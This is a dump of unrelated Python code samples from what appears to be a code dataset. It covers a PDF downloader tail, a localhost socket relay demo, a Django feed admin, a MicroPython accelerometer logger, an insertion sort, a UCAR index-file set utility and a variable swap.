    # Fetch the file index, then download every PDF it lists.
    json_object = download_file('http://10.30.1.21/index/ajaxfileserver')
    for item in json_object:
        ID = item['ID']
        filename = item['Filename']
        construct_pdf(ID, filename)
        print 'file number ' + str(ID) + ' done'
if __name__ == '__main__':
    main()
|
19,794 | 654210c791f2c388a428f40588ba33d3967fe408 | import socket
import threading
import time
# Flat demo script: the instance bound to port 40101 takes the "sender"
# branch (prompts the user, connects out, then listens); the else branch is
# a relay that forwards one received message to port 40103.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Socket Created")
portBroj = 40101
print("Port broj je ", portBroj)
s.bind(("localhost", portBroj))
if (portBroj == 40101):
    # Sender: ask for a destination port and a message, send it, then keep
    # accepting inbound connections and printing what arrives.
    c = socket.socket()
    portBrojToConnectTo = int(input("Na koji port da se spojim? "))
    stringZaPoslati = str(input("Upišite string za poslati: "))
    time.sleep(5)
    c.connect(('localhost', portBrojToConnectTo))
    c.send(bytes(stringZaPoslati, "utf-8"))
    print("Poruka poslana")
    s.listen(2)
    print("waiting for connections...")
    while True:
        c2, addr = s.accept()
        name = c2.recv(1024).decode()
        print("Connected with ", addr, name)
        c2.close()
else:
    # Relay: wait for one inbound message, then forward it to port 40103.
    # NOTE(review): unreachable as written, because portBroj is fixed to
    # 40101 a few lines above.
    s.listen(2)
    zaPoslati = "prazno zasad"
    print("waiting for connections...")
    while True:
        c, addr = s.accept()
        name = c.recv(1024).decode()
        print("Connected with ", addr, name)
        zaPoslati = name
        c.close()
        break
    c = socket.socket()
    '''
    portBrojToConnectTo = int(input("Na koji port da se spojim? "))
    '''
    portBrojToConnectTo = 40103
    time.sleep(5)
    c.connect(('localhost', portBrojToConnectTo))
    c.send(bytes(zaPoslati, "utf-8"))
|
19,795 | 9724310994c78e5e229671e31d1e7fab231dc3ab | from django.contrib import admin
from models import Feed, Entry
class EntryInline(admin.TabularInline):
    """Edit a feed's entries inline on the Feed admin page."""
    model = Entry
class FeedAdmin(admin.ModelAdmin):
    """Admin list view for feeds; the URL column is editable in place."""
    list_display = ('title','url','subtitle','encoding','version')
    list_editable = ('url',)
    inlines = [EntryInline]
class EntryAdmin(admin.ModelAdmin):
    """Admin list view for individual feed entries."""
    list_display = ('title','feed','link')
# Register both models with the admin site.
admin.site.register(Entry, EntryAdmin)
admin.site.register(Feed, FeedAdmin) |
19,796 | 5f52cf32561b4bb225ccc97b40da5c4065f60b04 | import machine
from pyb import Accel, ADC, Pin
from time import sleep_ms
import urandom
from math import atan, atan2, sin, cos, radians, degrees, sqrt, pow, pi
# Set up the switch to read 0 when not triggered, 1 when triggered
# Wiring:
# - Connect one side of switch to the 'X1' pin
# - Connect the other side of the switch to ground
switch = machine.Pin('X1', machine.Pin.IN, machine.Pin.PULL_UP)
accel = Accel()
print("Setup accel and switch objects")
print(accel)
print(switch)
sleeptime = 50 #milliseconds, i.e. 20 times/second
savetime = 5000 #milliseconds, how often to close and reopen the file in case of sudden shutdown
g_scaling = 22.42 #based on calibration readings, estimated reading in the z axis of 1g
yaw = 0 #assume consistent orientation towards front
def random_filename(N=6):
    """Return an N-character name from [A-G0-9] with a '.data' extension."""
    #TODO this isn't returning a random name....
    # NOTE(review): presumably the PRNG is never seeded on this MicroPython
    # port, so the same sequence (and thus the same name) comes back after
    # every reset -- confirm and seed from a hardware source if so.
    filename = ''.join(urandom.choice('ABCDEFG1234567890') for _ in range(N))
    return filename + '.data'
def calc_tilt_adjustments():
    """Average a burst of accelerometer readings while the board is still,
    derive pitch/roll, and return per-axis adjustment factors (mx, my, mz)."""
    sleep_ms(1000) #wait a second after button press to stabilize
    #Get the average of a few readings, assumes the board is in a stable position
    #TODO could check that variance is not large, and repeat until stable...
    xs = []
    ys = []
    zs = []
    for i in range(0,10):
        #Read the acceleration
        x = accel.x()
        y = accel.y()
        z = accel.z()
        #Scale it to between 1 and -1
        x,y,z = x/g_scaling, y/g_scaling, z/g_scaling
        xs.append(x)
        ys.append(y)
        zs.append(z)
        sleep_ms(10)
    x = sum(xs)/len(xs)
    y = sum(ys)/len(ys)
    z = sum(zs)/len(zs)
    #Calculate tilt
    #apply trigonometry to get the pitch and roll:http://physics.rutgers.edu/~aatish/teach/srr/workshop3.pdf
    #Unclear which is better pitch/roll formula, listing above is disputed..
    #pitch = rotation y, roll = rotation x
    #unknown z (because no gyroscope) requires consistent train/test of board in consistent orientation
    #orient with usb 'tail' trailing away from travel direction.
    try:
        roll = atan2(y,z)
        pitch = atan2(x, sqrt(y*y + z*z + 0.00001))
        #pitch = atan(x/sqrt(pow(y,2) + pow(z,2) + 0.01));
        #roll = atan(y/sqrt(pow(x,2) + pow(z,2) + 0.01))
    except ZeroDivisionError:
        # NOTE(review): atan2 never raises ZeroDivisionError, so this branch
        # is dead; if it ever did fire, pitch/roll would be unbound and the
        # lines below would raise NameError.
        print('divide by zero error: x {}, y {}, z {}'.format(x,y,z))
    #for debugging
    #convert radians into degrees
    #pitch = pitch * (180.0/pi);
    #roll = roll * (180.0/pi) ;
    #print("Pitch: {}, roll: {}".format(pitch, roll))
    #todo need to figure out multipliers....
    mx = 1
    my = y*cos(pitch) + z * sin(pitch)
    mz = y * sin(pitch) + z * cos(pitch)
    return mx, my, mz
def log_data():
    """Log brake-switch state plus pitch/roll (degrees) to a CSV file on the
    SD card, sampling every `sleeptime` ms.

    Bug fix: `savetime / sleeptime` is a float under true division and
    `range()` requires an int (TypeError on MicroPython/Python 3); use floor
    division instead.
    """
    # Per-axis adjustment factors from the tilt calibration.
    mx, my, mz = calc_tilt_adjustments()
    current_filename = "/sd/data/angles1.data"  # random_filename()
    print("Saving data to:", current_filename)
    # Start a new file with a CSV header.
    # TODO refactor to create a new file every X minutes if needed (currently 1 per session)
    with open(current_filename, 'w') as f:
        f.write("braking,x,y,z,adjX,adjY,adjZ\n")
    # The outer loop closes and reopens the file every `savetime` ms so data
    # survives a sudden shutdown.
    for j in range(0, 2):
        with open(current_filename, 'a') as f:
            for i in range(0, savetime // sleeptime):
                # Read the acceleration
                x = accel.x()
                y = accel.y()
                z = accel.z()
                roll = atan2(y, z)
                pitch = atan2(x, sqrt(y*y + z*z + 0.00001))
                # convert radians into degrees for logging
                pitch = pitch * (180.0/pi)
                roll = roll * (180.0/pi)
                # Read the switch status (1 = braking)
                braking = switch.value()
                f.write('{},{},{}\n'.format(braking, pitch, roll))
                sleep_ms(sleeptime)
        # The `with` block already closed the file here (the original's
        # explicit f.close() inside it was redundant).
        print("Saving file. Current values:", braking, pitch, roll)
|
def insert(x):
    """Sort the list x in place with insertion sort and return it.

    Fix: the while-condition tested ``x[j] > key`` before ``j >= 0``, so the
    guard read ``x[-1]`` (the last element, via negative indexing) once j
    went below zero; the bounds check now short-circuits first.
    """
    for i in range(1, len(x)):
        key = x[i]
        j = i - 1
        # Shift larger elements of the sorted prefix one slot right.
        while j >= 0 and x[j] > key:
            x[j + 1] = x[j]
            j -= 1
        x[j + 1] = key
    return x
# Demo: sort a sample list and show it before and after.
vlist = [1, 6, 2, 8, 10, 9, 12, 1, 16, 22, 11, 4,5,3, 6, 0, 3, 99, 21, 0, 6]
print(vlist)
vlist = insert(vlist)
print(vlist)
|
19,798 | 5fcfcb067c951cfaae080acfc5f99ba2df0770ff | #!/usr/bin/env python
# *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
# ** Copyright UCAR (c) 1992 - 2004
# ** University Corporation for Atmospheric Research(UCAR)
# ** National Center for Atmospheric Research(NCAR)
# ** Research Applications Program(RAP)
# ** P.O.Box 3000, Boulder, Colorado, 80307-3000, USA
# ** All rights reserved. Licenced use only.
# ** Do not copy or distribute without authorization.
# *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*/
import os, sys
#from sets import Set
import string
import sys_functions
#------------------------------------------------------------------
def set_difference(set_a, set_b):
    """
    Return the items that are in set_b but not in set_a.
    """
    return set_b - set_a
#------------------------------------------------------------------
def set_intersection(set_a, set_b):
    """
    Return the items that are in both set_a and set_b.
    """
    return set_b & set_a
#------------------------------------------------------------------
def sort_set(set_a):
    """
    Return set_a as a list sorted in descending order, so the most
    recent (largest) item comes first.
    """
    return sorted(set_a, reverse=True)
#------------------------------------------------------------------
def open_read_file(file):
    """
    Read an index file and return the set of file names found in it.
    Returns an empty set when the file does not exist.
    """
    file_name = set([])
    if (os.path.exists(file)):
        data = open(file, 'r')
        lines = data.readlines()
        # create an instance of IndexFileIO
        index_file_io = sys_functions.IndexFileIo()
        # print 'lines: '
        # print lines
        for line in lines:
            # parse_index_line splits one index line into (file name, date);
            # only the name is collected here.
            (name, date) = index_file_io.parse_index_line(line)
            file_name.add(name)
            #sp_line = string.split(line)
            #if (sp_line != []):
            # name = sp_line[0]
            # file_name.add(name)
    # print file_name
    return file_name
#------------------------------------------------------------------
def compare_files(input_index_file, output_index_file):
    """
    Return the entries listed in input_index_file that are missing from
    output_index_file (i.e. the files that have not been processed yet).
    """
    # Read both index files into sets of file names.
    available = open_read_file(input_index_file)
    processed = open_read_file(output_index_file)
    # set_difference(a, b) returns b - a, so this is available - processed.
    return set_difference(processed, available)
#------------------------------------------------------------------
def add_suffix(filenames, suffix):
    """Append "." + suffix to every name and return the new set.
    inputs:
        filenames - a set with all the filenames
        suffix - the extension to append (without the dot)
    output
        a new set with the suffix appended to each name
    """
    return {name + "." + suffix for name in filenames}
#------------------------------------------------------------------
def remove_suffix(filenames, suffix):
    """Strip the last len(suffix)+1 characters ("." + suffix) from every
    name and return the new set.
    inputs:
        filenames - a set with all the filenames
        suffix - the extension to strip (without the dot)
    output
        a new set with the suffix removed from each name
    """
    chop = len(suffix) + 1  # account for the "."
    return {name[:-chop] for name in filenames}
#------------------------------------------------------------------
def transform_suffix(filenames, suffix_old, suffix_new):
    """Replace the trailing "." + suffix_old on every name with
    "." + suffix_new and return the new set.
    inputs:
        filenames - a set with all the filenames
        suffix_old - the extension to strip (without the dot)
        suffix_new - the extension to append (without the dot)
    output
        a new set with the transformed names
    """
    chop = len(suffix_old) + 1  # account for the "."
    return {name[:-chop] + "." + suffix_new for name in filenames}
#------------------------------------------------------------------
def transform_prefix(filenames, prefix_old, prefix_new):
    """Replace the leading prefix_old on every name with prefix_new and
    return the new set.
    inputs:
        filenames - a set with all the filenames
        prefix_old - the prefix to strip
        prefix_new - the prefix to prepend
    output
        a new set with the transformed names
    """
    start = len(prefix_old)
    return {prefix_new + name[start:] for name in filenames}
#------------------------------------------------------------------
|
19,799 | e557c7352a953fd84ee12b904e194542a86bc823 | #swapping x and y values using if/else
x = 5
y = 7
if x >= y:
print x, y
else:
m = y
y = x
x = m
print x, y |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.